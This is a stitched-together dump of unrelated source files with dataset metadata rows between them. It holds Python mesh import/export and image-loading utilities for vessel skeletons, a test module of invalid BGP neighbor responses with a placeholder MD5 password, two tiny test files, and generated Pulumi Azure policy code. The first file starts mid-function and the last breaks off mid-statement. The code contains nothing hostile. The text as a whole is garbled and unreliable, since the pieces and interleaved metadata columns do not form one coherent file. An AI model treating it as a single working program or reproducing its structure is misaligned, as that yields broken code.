print("Not a valid option for reading skeltons")
return
# get skeleton properties as arrays
euclid_length = data_file.Euclideandistance.values
length = data_file.Branchlength.values
radii = data_file.averageintensityinner3rd.values
branch_id = data_file.SkeletonID.values
print("sorting data")
# get elem and node data
data_file = data_file.drop(['SkeletonID', 'Branchlength', 'averageintensityinner3rd', 'Euclideandistance'], axis=1)
data_file = data_file.values
(elems, nodes) = pg_utilities.sort_elements(data_file[:, 0:3], data_file[:, 3:6])
print("elements sorted")
# get rid of dud elements
(elems, [length, euclid_length, radii, branch_id]) = pg_utilities.remove_rows(elems, [length, euclid_length,
radii, branch_id])
return {'nodes': nodes, 'elems': elems, 'radii': radii, 'length': length, 'euclidean length': euclid_length,
'branch_id': branch_id}
def import_stemxy(stem_file):
# reading in the stem vessel to map the spiral artery location
stem_xy = open(stem_file, 'r')
stem_coor = stem_xy.readlines() # readlines
startLines = range(0, len(stem_coor))
for i in range(len(stem_coor)):
stem_coor[i] = stem_coor[i].split()
stem_xyList = []
stem_elemList = []
for i in startLines:
node = []
node.append(float(stem_coor[i][0])) # x coor of stem villi
node.append((float(stem_coor[i][1]))) # y coor of stem villi
stem_xyList.append(node)
elem = int(stem_coor[i][2]) - 1
stem_elemList.append(elem)
stem_xy.close()
return {'stem_xy': stem_xyList, 'elem': stem_elemList}
def import_exnode_tree(filename):
# count nodes for check of correct number for the user, plus use in future arrays
count_node = 0
# Initialise array of node numbers and values
node_array = np.empty((0, 7))
# open file
with open(filename) as f:
# loop through lines of file
while 1:
line = f.readline()
if not line:
break # exit if done with all lines
# identifying whether there is a node defined here
line_type = str.split(line)[0]
if (line_type == 'Node:'): # line defines new node
count_node = count_node + 1 # count the node
count_atribute = 0 # intitalise attributes of the node (coordinates, radius)
node_array = np.append(node_array, np.zeros((1, 7)),
axis=0) # initialise a list of attributes for each node
node_array[count_node - 1][count_atribute] = int(str.split(line)[1]) - 1
else:
line_num = is_float(line_type) # checking if the line is a number
if (line_num): # it is a number
if not "index" in line:
count_atribute = count_atribute + 1
node_array[count_node - 1][count_atribute] = float(str.split(line)[0])
if (count_atribute < 7):
node_array = np.delete(node_array, np.s_[count_atribute + 1:7], axis=1)
total_nodes = count_node
return {'total_nodes': total_nodes, 'nodes': node_array}
def import_exelem_tree(filename):
# count element for check of correct number for the user, plus use in future arrays
count_el = 0
# Initialise array of el numbers and values
el_array = np.empty((0, 3), dtype=int)
# open file
with open(filename) as f:
# loop through lines of file
while 1:
line = f.readline()
if not line:
break # exit if done with all lines
# identifying whether there is an element defined here
line_type = str.split(line)[0]
if (line_type == 'Element:'): # line dedfines new el
count_el = count_el + 1 # count the el
count_atribute = 0 # intitalise attributes of the el (1st el, 2nd el)
el_array = np.append(el_array, np.zeros((1, 3), dtype=int), axis=0)
el_array[count_el - 1][count_atribute] = int(str.split(line)[1]) - 1
else:
line_num = is_float(line_type) # checking if the line is a number
if (line_num): # it is a number
if "#Values" not in line and "l.Lagrange" not in line and "1.000000000000000e+00" not in line and "0.1000000000000000E+01" not in line:
count_atribute = count_atribute + 1
el_array[count_el - 1][count_atribute] = float(str.split(line)[0]) - 1 # first node of element
el_array[count_el - 1][count_atribute + 1] = float(
str.split(line)[1]) - 1 # 2nd node of element
total_el = count_el
return {'total_elems': total_el, 'elems': el_array}
def is_float(str):
try:
num = float(str)
except ValueError:
return False
return True
def export_exelem_3d_quadratic(data, groupname, filename):
# Exports element locations to exelem format
# data = array of data
# groupname = what you want your data to be called in cmgui
# filename = file name without extension
data_num = len(data)
filename = filename + '.exelem'
f = open(filename, 'w')
f.write(" Group name: %s\n" % groupname)
f.write(" Shape. Dimension=3\n")
f.write(" #Scale factor sets= 1\n")
f.write(" q.Lagrange*q.Lagrange*q.Lagrange, #Scale factors=27\n")
f.write(" #Nodes= 27\n")
f.write(" #Fields=1\n")
f.write(" 1) coordinates, coordinate, rectangular cartesian, #Components=3\n")
f.write(" x. q.Lagrange*q.Lagrange*q.Lagrange, no modify, standard node based.\n")
f.write(" #Nodes= 27\n")
f.write(" 1. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 2. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 3. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 4. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 5. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 6. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 7. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 8. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 9. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 10. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 11. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 12. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 13. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 14. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 15. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 16. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 17. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 18. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 19. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 20. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 21. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 22. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 23. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 24. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 25. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 26. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 27. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" y. q.Lagrange*q.Lagrange*q.Lagrange, no modify, standard node based.\n")
f.write(" #Nodes= 27\n")
f.write(" 1. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 2. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 3. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 4. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 5. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 6. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 7. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 8. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 9. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 10. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 11. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 12. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 13. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 14. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 15. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 16. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 17. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 18. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 19. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 20. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 21. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 22. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 23. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 24. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 25. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 26. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 27. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" z. q.Lagrange*q.Lagrange*q.Lagrange, no modify, standard node based.\n")
f.write(" #Nodes= 27\n")
f.write(" 1. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 2. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 3. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 4. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 5. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 6. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 7. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 8. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 9. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 10. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 11. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 12. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 13. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 14. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 15. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 16. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 17. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 18. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 19. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 20. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 21. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 22. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 23. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 24. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 25. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 26. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 27. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
for x in range(0, data_num):
f.write(" Element: %s 0 0\n" % int(data[x][0] + 1))
f.write(" Nodes:")
f.write(
" %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s \n" % (
int(data[x][1] + 1), int(data[x][2] + 1), int(data[x][3] + 1), int(data[x][4] + 1), int(data[x][5] + 1),
int(data[x][6] + 1), int(data[x][7] + 1), int(data[x][8] + 1), int(data[x][9] + 1),
int(data[x][10] + 1), int(data[x][11] + 1), int(data[x][12] + 1), int(data[x][13] + 1),
int(data[x][14] + 1), int(data[x][15] + 1), int(data[x][16] + 1), int(data[x][17] + 1),
int(data[x][18] + 1), int(data[x][19] + 1), int(data[x][20] + 1), int(data[x][21] + 1),
int(data[x][22] + 1), int(data[x][23] + 1), int(data[x][24] + 1), int(data[x][25] + 1),
int(data[x][26] + 1), int(data[x][27] + 1)))
f.write("Scale factors:\n")
f.write(
"1.0000000000000000E+00 1.0000000000000000E+00 1.0000000000000000E+00 1.0000000000000000E+00 1.0000000000000000E+00 1.0000000000000000E+00 1.0000000000000000E+00 1.0000000000000000E+00 1.0000000000000000E+00 1.0000000000000000E+00 1.0000000000000000E+00 1.0000000000000000E+00 1.0000000000000000E+00 1.0000000000000000E+00 1.0000000000000000E+00 1.0000000000000000E+00 1.0000000000000000E+00 1.0000000000000000E+00 1.0000000000000000E+00 1.0000000000000000E+00 1.0000000000000000E+00 1.0000000000000000E+00 1.0000000000000000E+00 1.0000000000000000E+00 1.0000000000000000E+00 1.0000000000000000E+00 1.0000000000000000E+00\n")
f.close()
def export_exfield_3d_quadratic(data, groupname, fieldname, filename):
# Exports element fields to exelem format
# data = array of data
# groupname = what you want your data to be called in cmgui
# filename = file name without extension
data_num = len(data)
filename = filename + '.exelem'
f = open(filename, 'w')
f.write(" Group name: %s\n" % groupname)
f.write(" Shape. Dimension=3 line*line*line\n")
f.write(" #Scale factor sets= 0\n")
f.write(" #Nodes= 0\n")
f.write(" #Fields=1\n")
f.write(" 1) %s, field, rectangular cartesian, #Components=1\n" % fieldname)
f.write(" %s. l.Lagrange*l.Lagrange*l.Lagrange, no modify, grid based.\n" % fieldname)
f.write(" #xi1=1 \n")
f.write(" #xi2=1 \n")
f.write(" #xi3=1 \n")
for x in range(0, data_num):
f.write(" Element: %s 0 0\n" % int(x + 1))
f.write(" Values:\n")
f.write(
" %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s\n" % (
data[x], data[x], data[x], data[x], data[x], data[x], data[x], data[x], data[x], data[x],
data[x], data[x], data[x], data[x], data[x], data[x], data[x], data[x], data[x], data[x],
data[x], data[x], data[x], data[x], data[x], data[x], data[x]))
f.close()
######
# Function: Loads in a stack of images, located in path, and with naming convention name (goes slice at a time to avoid memory errors)
# Inputs: numImages - integer, number of images in the stack
# name - string for name of images. Note images must be numbered from 0
# Outputs: Image, a 3D BOOLEAN array containing image
######
def load_image_bool(name, numImages):
# read in first image + get dimensions to initialize array
with warnings.catch_warnings():
warnings.simplefilter("ignore")
print(name.format(0))
im = io.imread(name.format(0))
gray_image = skimage.color.rgb2gray(im)
skimage.img_as_bool(gray_image)
Image = np.zeros([im.shape[0], im.shape[1], numImages], dtype=bool)
Image[:, :, 0] = gray_image
# load all slices
for i in range(0, numImages):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
im = io.imread(name.format(i))
gray_image = skimage.color.rgb2gray(im)
skimage.img_as_bool(gray_image)
Image[:, :, i] = gray_image
print('Image ' + name + ' loaded. Shape: ' + str(Image.shape))
return Image
| 44.816393
| 689
| 0.519936
| 5,898
| 41,007
| 3.575958
| 0.056629
| 0.155611
| 0.159973
| 0.111517
| 0.813522
| 0.807122
| 0.794747
| 0.766204
| 0.756105
| 0.751363
| 0
| 0.055748
| 0.325042
| 41,007
| 915
| 690
| 44.816393
| 0.706265
| 0.10286
| 0
| 0.79845
| 0
| 0.01938
| 0.473723
| 0.031036
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021964
| false
| 0
| 0.011628
| 0
| 0.043928
| 0.009044
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d49a72bf61bc74a66cb37769866a778598af822d
| 5,558
|
py
|
Python
|
routers/frr/tests/data/__init__.py
|
packethost/network-helpers
|
dea147cf87d199a7b948f65d89612cb29253474c
|
[
"Apache-2.0"
] | 12
|
2020-05-15T00:11:44.000Z
|
2022-02-23T21:24:51.000Z
|
routers/frr/tests/data/__init__.py
|
packethost/network-helpers
|
dea147cf87d199a7b948f65d89612cb29253474c
|
[
"Apache-2.0"
] | null | null | null |
routers/frr/tests/data/__init__.py
|
packethost/network-helpers
|
dea147cf87d199a7b948f65d89612cb29253474c
|
[
"Apache-2.0"
] | 3
|
2021-04-19T14:28:51.000Z
|
2022-02-23T21:24:52.000Z
|
from typing import Any, List
INVALID_RESPONSES: List[Any] = [
"<html>404 Error</html>",
{"errors": ["Not found"]},
{
"bgp_neighbors": [
{
"md5_enabled": True,
"md5_password": "ValidPassword123",
"multihop": True,
"peer_as": 65530,
"peer_ips": [
"fc00:0000:0000:0000:0000:0000:0000:000e",
"fc00:0000:0000:0000:0000:0000:0000:000f",
],
"routes_in": [
{"exact": False, "route": "2604:1380:1:7400::/56"},
{"exact": False, "route": "2604:1380:4111:2300::/56"},
],
"routes_out": [],
}
]
},
{
"bgp_neighbors": [
{
"address_family": 4,
"customer_as": 65000,
"customer_ip": "10.99.182.129",
"md5_enabled": True,
"md5_password": "ValidPassword123",
"multihop": False,
"peer_as": 65530,
"peer_ips": [],
"routes_in": [
{"exact": False, "route": "10.1.0.0/31"},
{"exact": False, "route": "10.2.0.0/29"},
],
"routes_out": [],
},
{
"address_family": 6,
"customer_as": 65000,
"customer_ip": "2604:1380:4111:2300::1",
"md5_enabled": True,
"md5_password": "ValidPassword123",
"multihop": False,
"peer_as": 65530,
"peer_ips": [],
"routes_in": [
{"exact": False, "route": "2604:1380:1:7400::/56"},
{"exact": False, "route": "2604:1380:4111:2300::/56"},
],
"routes_out": [],
},
]
},
{
"bgp_neighbors": [
{
"address_family": 4,
"customer_as": 65000,
"customer_ip": "10.99.182.129",
"md5_enabled": True,
"md5_password": "ValidPassword123",
"multihop": True,
"peer_as": 65530,
"peer_ips": ["169.254.255.1", "169.254.255.2"],
"routes_in": [
{"exact": False, "route": "10.1.0.0/31"},
{"exact": False, "route": "10.2.0.0/29"},
],
"routes_out": [],
},
{
"address_family": 6,
"customer_as": 65000,
"customer_ip": "2604:1380:4111:2300::1",
"md5_enabled": True,
"md5_password": "ValidPassword123",
"multihop": True,
"peer_as": 65530,
"peer_ips": [
"fc00:0000:0000:0000:0000:0000:0000:000e",
"fc00:0000:0000:0000:0000:0000:0000:000f",
],
"routes_in": [
{"exact": False, "route": "2604:1380:1:7400::/56"},
{"exact": False, "route": "2604:1380:4111:2300::/56"},
],
"routes_out": [],
},
],
"network": {
"addresses": [
{
"address": "147.75.65.31",
"address_family": 4,
"cidr": 31,
"customdata": {},
"enabled": True,
"gateway": "147.75.65.30",
"global_ip": None,
"manageable": True,
"management": False,
"netmask": "255.255.255.254",
"network": "147.75.65.30",
"public": True,
},
{
"address": "2604:1380:1:5f00::1",
"address_family": 6,
"cidr": 127,
"customdata": {},
"enabled": True,
"gateway": "2604:1380:1:5f00::",
"global_ip": None,
"manageable": True,
"management": False,
"netmask": "ffff:ffff:ffff:ffff:ffff:ffff:ffff:fffe",
"network": "2604:1380:1:5f00::",
"public": True,
},
{
"address": "10.99.182.129",
"address_family": 4,
"cidr": 31,
"customdata": {},
"enabled": True,
"gateway": "10.99.182.128",
"global_ip": None,
"manageable": True,
"management": False,
"netmask": "255.255.255.254",
"network": "10.99.182.128",
"public": False,
},
{
"address": "10.99.182.254",
"address_family": 4,
"cidr": 32,
"customdata": {},
"enabled": True,
"gateway": "10.99.182.254",
"global_ip": None,
"manageable": True,
"management": False,
"netmask": "255.255.255.255",
"network": "10.99.182.254",
"public": False,
},
]
},
},
]
| 35.401274
| 74
| 0.348507
| 432
| 5,558
| 4.358796
| 0.1875
| 0.084971
| 0.101965
| 0.101965
| 0.789166
| 0.789166
| 0.774296
| 0.751992
| 0.7265
| 0.675518
| 0
| 0.203299
| 0.498201
| 5,558
| 156
| 75
| 35.628205
| 0.471854
| 0
| 0
| 0.664516
| 0
| 0
| 0.326916
| 0.06729
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.032258
| 0.006452
| 0
| 0.006452
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d49a859688a297a94196731945707633c98a8f30
| 134
|
py
|
Python
|
tests/test_phsic.py
|
meshidenn/phsic
|
0f89ebf27c6501f0bb9d4e11688e57823ebb7359
|
[
"BSD-3-Clause"
] | 9
|
2018-11-03T11:17:59.000Z
|
2022-02-17T03:18:31.000Z
|
tests/test_phsic.py
|
meshidenn/phsic
|
0f89ebf27c6501f0bb9d4e11688e57823ebb7359
|
[
"BSD-3-Clause"
] | 6
|
2020-01-16T06:35:26.000Z
|
2020-01-17T02:20:24.000Z
|
tests/test_phsic.py
|
meshidenn/phsic
|
0f89ebf27c6501f0bb9d4e11688e57823ebb7359
|
[
"BSD-3-Clause"
] | 3
|
2019-11-11T20:06:17.000Z
|
2020-04-10T14:56:33.000Z
|
from phsic import __version__
from phsic import app
def test_version():
assert __version__ == '0.1.0'
def test_app():
app
| 12.181818
| 33
| 0.69403
| 20
| 134
| 4.15
| 0.5
| 0.216867
| 0.361446
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028571
| 0.216418
| 134
| 10
| 34
| 13.4
| 0.761905
| 0
| 0
| 0
| 0
| 0
| 0.037313
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d4b6ea8ec8dbac46257c2af21475e8ab8db14040
| 87
|
py
|
Python
|
pointCollection/glah12/__init__.py
|
tsutterley/pointCollection
|
04e4359e463ff8a556e0d078373578bd96390151
|
[
"MIT"
] | null | null | null |
pointCollection/glah12/__init__.py
|
tsutterley/pointCollection
|
04e4359e463ff8a556e0d078373578bd96390151
|
[
"MIT"
] | null | null | null |
pointCollection/glah12/__init__.py
|
tsutterley/pointCollection
|
04e4359e463ff8a556e0d078373578bd96390151
|
[
"MIT"
] | null | null | null |
from .data import data
from .campaign_bias_correction import campaign_bias_correction
| 21.75
| 62
| 0.873563
| 12
| 87
| 6
| 0.5
| 0.333333
| 0.611111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 87
| 3
| 63
| 29
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d4ce83666196f38366d803aa20c42127c5243158
| 32
|
py
|
Python
|
tests/test_foocat_tb.py
|
TBarasch/foocat_tb
|
3b64dbb374fdfe6c8f8a640ae4dd44f61fb6b45c
|
[
"MIT"
] | null | null | null |
tests/test_foocat_tb.py
|
TBarasch/foocat_tb
|
3b64dbb374fdfe6c8f8a640ae4dd44f61fb6b45c
|
[
"MIT"
] | null | null | null |
tests/test_foocat_tb.py
|
TBarasch/foocat_tb
|
3b64dbb374fdfe6c8f8a640ae4dd44f61fb6b45c
|
[
"MIT"
] | null | null | null |
from foocat_tb import foocat_tb
| 16
| 31
| 0.875
| 6
| 32
| 4.333333
| 0.666667
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 32
| 1
| 32
| 32
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d4cf0d367e1f33008e30c9aa47e8551212e14de0
| 36,579
|
py
|
Python
|
sdk/python/pulumi_azure/core/resource_group_policy_assignment.py
|
ScriptBox99/pulumi-azure
|
1b8c6d5479ccabc39094741eac25a8ca44c8833a
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/core/resource_group_policy_assignment.py
|
ScriptBox99/pulumi-azure
|
1b8c6d5479ccabc39094741eac25a8ca44c8833a
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/core/resource_group_policy_assignment.py
|
ScriptBox99/pulumi-azure
|
1b8c6d5479ccabc39094741eac25a8ca44c8833a
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ResourceGroupPolicyAssignmentArgs', 'ResourceGroupPolicyAssignment']
@pulumi.input_type
class ResourceGroupPolicyAssignmentArgs:
def __init__(__self__, *,
policy_definition_id: pulumi.Input[str],
resource_group_id: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
enforce: Optional[pulumi.Input[bool]] = None,
identity: Optional[pulumi.Input['ResourceGroupPolicyAssignmentIdentityArgs']] = None,
location: Optional[pulumi.Input[str]] = None,
metadata: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
non_compliance_messages: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]]] = None,
not_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
parameters: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a ResourceGroupPolicyAssignment resource.
:param pulumi.Input[str] policy_definition_id: The ID of the Policy Definition or Policy Definition Set. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[str] resource_group_id: The ID of the Resource Group where this Policy Assignment should be created. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[str] description: A description which should be used for this Policy Assignment.
:param pulumi.Input[str] display_name: The Display Name for this Policy Assignment.
:param pulumi.Input[bool] enforce: Specifies if this Policy should be enforced or not?
:param pulumi.Input['ResourceGroupPolicyAssignmentIdentityArgs'] identity: An `identity` block as defined below.
:param pulumi.Input[str] location: The Azure Region where the Policy Assignment should exist. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[str] metadata: A JSON mapping of any Metadata for this Policy.
:param pulumi.Input[str] name: The name which should be used for this Policy Assignment. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[Sequence[pulumi.Input['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]] non_compliance_messages: One or more `non_compliance_message` blocks as defined below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] not_scopes: Specifies a list of Resource Scopes (for example a Subscription, or a Resource Group) within this Management Group which are excluded from this Policy.
:param pulumi.Input[str] parameters: A JSON mapping of any Parameters for this Policy. Changing this forces a new Management Group Policy Assignment to be created.
"""
pulumi.set(__self__, "policy_definition_id", policy_definition_id)
pulumi.set(__self__, "resource_group_id", resource_group_id)
if description is not None:
pulumi.set(__self__, "description", description)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if enforce is not None:
pulumi.set(__self__, "enforce", enforce)
if identity is not None:
